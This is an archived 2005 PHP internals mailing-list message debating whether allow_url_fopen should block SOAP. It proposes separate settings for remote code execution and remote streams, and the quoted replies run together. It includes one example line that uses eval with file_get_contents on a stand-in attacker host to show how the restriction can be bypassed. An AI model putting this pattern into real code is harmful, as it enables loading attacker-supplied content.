Re: Re: SOAP SSL support doesn't work when allow_url_fopen is turned off
| From: | George Schlossnagle | Date: | Thu, 28 Jul 2005 13:39:28 +0000 |
| Subject: | Re: Re: SOAP SSL support doesn't work when allow_url_fopen is turned off | ||
| References: | 1 2 3 4 5 6 7 | Groups: | php.internals |
| Request: | Send a blank email to internals+get-17442@lists.php.net to get a copy of this message | ||
On Jul 28, 2005, at 9:28 AM, Zeev Suraski wrote:
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:sure: eval('file_get_contents("http://evil.org");'); You could say this is just bad policy on the part of code authors, but that's what these options were geared to handle in the first place, right? GeorgeZeev Suraski wrote:That may be a good alternative. We need to figure out whether there are any other functionality that may pose a security risk, other than include/require of remote files - can anybody think of anything? If not, then that's probably the best alternative: 1. Deprecate allow_url_fopens 2. Introduce allow_remote_code_execution 3. Introduce allow_remote_streams (effectively allow_url_fopens renamed, except it doesn't affect include/require)At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:Why not simply make existing INI option only restrict script loading operations such as include/require, afterall this is what it tries to primarily prevent anyway.What exactly can you do with it other than query remote data sources? I tend to agree with Adam (and I guess Wez) - SOAP should not be affected by allow_url_fopen.Are you therefore saying SOAP support should be 100% diabled when allow_url_fopen is off?SOAP is not disabled, simply prevented from querying remote data sources directly.